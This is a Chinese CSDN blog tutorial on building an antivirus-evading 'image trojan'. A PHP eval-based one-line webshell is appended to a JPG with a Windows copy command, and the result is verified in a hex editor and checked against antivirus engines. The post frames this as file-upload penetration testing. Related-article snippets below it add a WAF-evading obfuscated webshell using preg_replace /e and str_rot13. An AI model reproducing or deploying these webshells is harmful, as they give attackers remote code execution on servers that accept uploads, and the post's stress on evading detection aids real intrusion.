php 一张图片叠到另一张图片上面_免杀图片马制作详细教程

最新推荐文章于 2024-04-24 11:30:00 发布
最新推荐文章于 2024-04-24 11:30:00 发布
阅读量405 收藏
点赞数
文章标签: php 一张图片叠到另一张图片上面
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39934613/article/details/111652662
版权

d62dea6883cb63c9957338c930a45f4c.png

文件上传漏洞作为常规渗透测试工作不可或缺一类漏洞,经常需要使用到一种重要的测试工具——图片马,下面陈老师来教各位童鞋怎样制作一枚免杀的图片马。

第一步 准备一张图片+一句话木马

把图片文件命名为demo.jpg

d126b6aea9371e90fc6eb01938e52946.png

把一句话木马文件命名为yjh.php(根据不同的开发语言,有不同类型的一句话木马,这里以PHP语言为例子

fd242329bcae86d9fcfd6f3bef5fd2ce.png

227a0c99c1e7e59d016d665558112697.png

这里需要强调一下开发语言规范性,一句话木马代码:<?php @eval($_POST['caidao']);?>

<?php:PHP程序启动

?>:PHP程序闭合

@eval:eval函数,函数即方法,在编程规范里面,方法名是必须用小写表示的,这里注意一定要小写!

$_POST:在PHP语言中,前面有$符号,表示这是一个变量,$_POST要看成一个固定搭配,这里注意POST一定要大写!

'caidao':参数名称,可以填写任意英文字符,这里注意一定要加上引号!

第二步 合成

用快捷键“win+R”打开cmd,先进入到先前准备好的两个文件的存放路径,然后敲命令行:copy demo.jpg/b + yjh.php tpm.jpg

68b650eb08e6e767a4b64e7349d176a0.png

这句命令有很强的顺序规范性,否则执行不成功,必须要注意以下两点:1,图片文件名称一定要先敲,代码文件名称一定要放后面;2.图片文件名称一定接“/b”,“/b”代表这是一个二进制文件。

OK,敲完命令后,我们会看到原路径下多了一个合成后的图片文件

d4379f1c0b8f8f8ee3cd6c76e760bd28.png

第三步 验证

先打开图片查看是否正常显示

9ef31cfa5f594b0e6cfaa832e093ae23.png

然后用十六进制编辑软件winhex来打开合成后的tpm.jpg文件

3687035f9dda9396f6214cb0f2c181d4.png

从截图可以看到,一句话木马已经内嵌在里面了

嫌麻烦的话,这里也可以直接用notepad++打开验证

75f22d160d397ce7b574d351f043d722.png

至此,一枚完美的图片马制作成功啦!!!

隐藏福利——免杀

将制作成功的图片马放到virscan上面跑一下,你会发现国内一众知名杀毒软件包括360/瑞星/金山毒霸等等的病毒库都没有能够识别出木马病毒,企业常用的主机杀软——趋势科技也未能幸免,反倒是美国加州的一款老牌杀软Fortinet(国内译:飞塔)仍可以识别出来。

dd05e6f2f4dcad8aaa56cbaf30ebba02.png

eca4fb103b29927bba3ec119c2a93a2f.png

再单独测试一下安全研究员的标配——火绒,测试结果依然是凉凉。

f0ba3aaa9dcd8e691ee2a30e7d2329ba.png
weixin_39934613
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php 图片,php图片实现原理
weixin_27310417的博客
03-09 4357
什么是木病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。那,php的木是长什么样的呢?我们来看下面这段代码:...
php如何放照片,怎样在图片上加上自己的照片 在图片方框中嵌入另一张照片显示...
weixin_30174223的博客
03-10 779
刷到一条有趣的话题消息,一名网友在网上分享了自己的桌面截图,桌面壁纸是一个空旷的房间,壁纸上有桌子、壁画、书架,他将软件图标全部移动在书架位置上,比较好玩的是,我的电脑图标放在壁纸上的桌子桌面位置,而回收站图标则放在桌底,一看他的这个桌面截图就能看出这名网友是强迫症。于是就有热心网友将这个桌面壁纸的原图分享了,而问题又来了,该桌面壁纸原图上的壁画也是空的,也就是要自己在这张壁纸上的壁画方框中添加照...
web安全-文件上传漏洞-图片制作-相关php函数讲解-upload靶场通关详细教学(3)
最新发布
m0_59598029的博客
04-24 1052
制作图片有两种方法,一种是文本方式打开,末尾粘贴一句话木,令一种是使用命令进行合成。首先准备好一个图片(这里是1.png)。!将一个图片以文本格式打开(这里用的Notepad++,以记事本方式打开修改也能连接成功,不过修改后图片无法正常显示了)。!后面粘贴上一句话木。!图片依然可以正常打开。!首先准备好一个图片(这里是1.png)。再准备好一个一句话木(这里是2.php)。!打开命令提示符,首先进入上面两个文件存放的路径。使用下面的命令进行图片合成。!!
php 一张图片到另一张图片上面_苹果图片墙动画也太太太太太太炫酷了吧!...
weixin_39895881的博客
12-08 180
作者 |职场叨叨君来源 | 办公资源(pptziyuan)大家好,我是叨叨君。本期又和大家见面了,上周出了期如何教大家用PPT制作标题动画—影字效果的教程,就有位小伙伴在文章底部留言了,希望我能出一期苹果发布会那样的炫酷图片墙动画教程,看到留言,叨叨君立安排。为了找到苹果发布会用的图片墙动画效果,我特地去看了下今年秋季的苹果发布会视频,截了两张动图:不得不说苹果这个图片墙动画效果做...
php怎么把字弄到另一张图片上,怎样把一张图片p到另外一张图片上去
weixin_33387339的博客
03-24 1258
把一张图片p到另外一张图片上去的方法:首先打开PS,选择需要做背景的图片并打开;然后然后拖动第二张素材图片到背景图层上;接着选中图层2副本执行“选择-色彩范围”;最后点击【Delete】键删除选区内的像素即可。本文操作环境:windows7系统、Adobe Photoshop CS6版,DELL G3电脑。首先我们打开PS,然后执行文件-打开命令,然后选择需要做背景的图片并打开,如下图所示:然后拖...
图片
good good study
05-27 1257
​继上一篇—msf shellcode分离,这篇利用隐写术将 Shellcode 隐写入 PNG 图片 RGB 像素中,从而隐藏后门代码,并进行远程加载控制目标主机。
Favicon.ico图片在线制作网站PHP源码+支持多种图片格式转换
07-10
在线ICO图标制作Favicon.ico图片在线制作网站PHP源码+支持多种图片格式转换 favicon.ico一般用于作为缩略的网站标志,它显示位于浏览器的地址栏或者在标签上,用于显示网站的logo,如图红圈的位置, 目前主要的浏览器...
使用PHP实现多张图片合成一张1
08-08
在本文中,我们将探讨如何使用PHP实现多张图片合成一张图片的功能。这一过程涉及到PHP的图像处理能力,特别是图像操作函数...这在各种应用场景中都非常有用,比如创建拼贴画、制作海报或者处理用户上传的多张照片。
在线生成图片 源码 含教程 详细注释 PSD分层文件
09-07
选取一张图片作为模板,利用SAE中PHP的GD库,画出前台用户提交的内容,返回给前台浏览器进行展示。 GD库是php处理图形的扩展库,GD库提供了一系列用来处理图片的API,使用GD库可以创建图片、处理图片。在网站上GD库...
一个PHP多功能图片处理类库
04-28
4. **裁剪**:裁剪功能可以帮助用户从一张大图中提取出感兴趣的部分,或者根据特定尺寸进行裁剪,如制作头像或产品展示图。 5. **旋转**:图片在拍摄时可能会因设备或角度问题导致方向不对,旋转功能则可以纠正这个...
php实现多张图片合成一张
03-01
PHP中实现多张图片合成一张是一项常见的图像处理任务,特别是在网页开发或者图像应用中。这一功能可以帮助我们创建拼贴图、制作动态效果或者合并多个小图标为一个大图标等。下面将详细介绍如何使用PHP来完成这个...
cpp-将多张图片拼接成一幅全景图
08-16
将多张图片拼接成一幅全景图
EXE转JPG格式工具
04-24
把EXE转JPG格式的一款小工具,需要的朋友可以下载
sweetie 的博客
04-12 840
一般的php一句话后门很容易被网站防火墙waf拦截,而waf通常通过判断关键字来辨别一句话木,要想绕过waf就需要对木进行一些变形。(仅供分享经验,不可用作非法用途) 图片来源 一.先看一只有趣的小 <?php ($b4dboy = $_POST['b4dboy']) &&@preg_replace('/ad/e','@'.str_rot13('riny')."($b4dboy)", 'add'); ?> 沙箱检测它是安全文件 用D盾查只是发现可以的str_rot1
thinkphp5 第23课:文件上传-上传学生照片,学号指定为文件名
李书明(石家庄)的专栏
09-20 1044
在上传文件时,我们可以限定上传文件的大小,也可以限定上传文件的类型(如:只能上传jpg, gif格式),另外上传到服务器的文件名不要随机生成,由我们来指定。 模板文件代码 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>添加学...
php一句话图片过滤_php一句话图片怎么解析
weixin_29495679的博客
03-08 349
一句话木解析首先,学习渗透时,木大概也就三种:大、小、一句话。常见的一句话:这个应该是最常见的了...看一下他的组成.首先是一个eval函数,其次是post提交一个参数为x的值.首先我们看看eval函数是干什么的。官方说明:eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NUL...
php8木误报,我网站被挂木了悲剧“超级带(批量挂)PHP
weixin_32154109的博客
03-10 323
$tb->tableheader();$tb->formheader($action,'执行 SQL 语句');$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,''...
nginx+php 上传含有php脚本的木图片文件的漏洞解决
xuyaqun的专栏
12-03 5547
http://www.80sec.com/nginx-securit.html漏洞详解解决方法:解决方案:我们已经尝试联系官方,但是此前你可以通过以下的方式来减少损失关闭cgi.fix_pathinfo为0或者if ( $fastcgi_script_name ~ /..*//.*php ) {return 403;}漏洞危险等级:毁灭性。 这个漏洞严格上说并不是 Nginx 和 PHP 本身的漏洞造成的,而是由配置造成的。在我之前写的许多配置中,都普遍存在这个漏洞。 简易检测方法: 打开 Nginx +
thinkphp 检测上传的图片中是否含有木脚本
璀璨烟花
09-17 1418
1.检测原理 要想检测图片中是否含有木脚本,首先从制作原理来分析这种木程序。这种木程序是十六进制编码写的,图片的十六进制代码中主要包含<% ( ) %>、<? ( ) ?> 、<script | /script>,所以我们可以通过检测十六进制代码来检测木脚本。 2.解决方案 2.1编写Upload类 要想上传图片文件,先定义一个上传文件的方法,然...
WordPress 3.5以上版本调用新媒体中心上传图片教程
"wordpress进阶教程(三十四):调用新版的媒体中心上传图片" 本文主要介绍了如何在WordPress 3.5及以上版本中调用新的媒体中心上传图片,这一功能相较于旧版提供了更友好的多选图片界面。在WordPress 3.5以前,上传...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值